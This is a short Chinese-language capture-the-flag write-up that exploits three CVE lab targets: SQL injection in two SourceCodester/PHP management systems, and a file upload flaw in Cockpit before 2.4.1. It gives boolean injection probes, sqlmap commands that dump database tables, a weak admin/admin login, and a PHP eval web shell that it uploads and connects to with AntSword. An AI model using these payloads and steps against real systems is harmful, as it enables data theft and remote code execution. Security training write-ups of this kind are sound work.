shuashuashua

CVE-2023-2130

靶标介绍：

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

通过标靶介绍可以知道在/admin/suppliers/view_details.php页面存在参数id有sql注入漏洞，访问该页面

当参数id=1' and 1=1 --+时正确，id=1' and 1=2 --+时错误，说明存在sql注入漏洞。

抓包，把请求信息保存到5.txt文件中，sqlmap梭哈

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D purchase_order_db --tables

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D purchase_order_db -T fllllaaaag -C flag --dump

得到flag

CVE-2023-1313

靶标介绍：

cockpit在2.4.1版本之前存在任意文件上传漏洞PS：通过在浏览器中打开/install来运行安装

一个登录界面，他的提升通过/install来运行安装，访问/install,但是重定向到了原登录界面，dirsearch进行目录扫描，

 可以看到存在该目录，但是不能够访问，尝试弱口令登录

admin    /      admin

成功登录进去，

找上传页面

上传一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

上传成功后下载，浏览后得到上传目录

访问该路径

可以看到配置文件界面，说明上传成功,连接蚁剑

CVE-2023-0562

靶标介绍：

银行储物柜管理系统是一个基于网络的应用程序，用于处理存储银行客户贵重物品的银行储物柜。储物柜的所有详细信息都保存在数据库中。银行储物柜管理系统项目是使用 PHP 和 MySQLi 扩展开发的。

存在mysqli扩展，有数据库，可能存在sql注入，寻找注入点

在这个地方搜索会进行POST传参，然后重定向到该页面

抓包测试

把抓包的内容放到5.txt文件中

searchinput=*    *会默认把该参数作为注入点

sqlmap -r 5.txt --batch --dbs

sqlmap -r 5.txt --batch -D blmsdb --tables

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag --columns

sqlmap -r 5.txt --batch -D blmsdb -T fllllaaaag -C flag --dump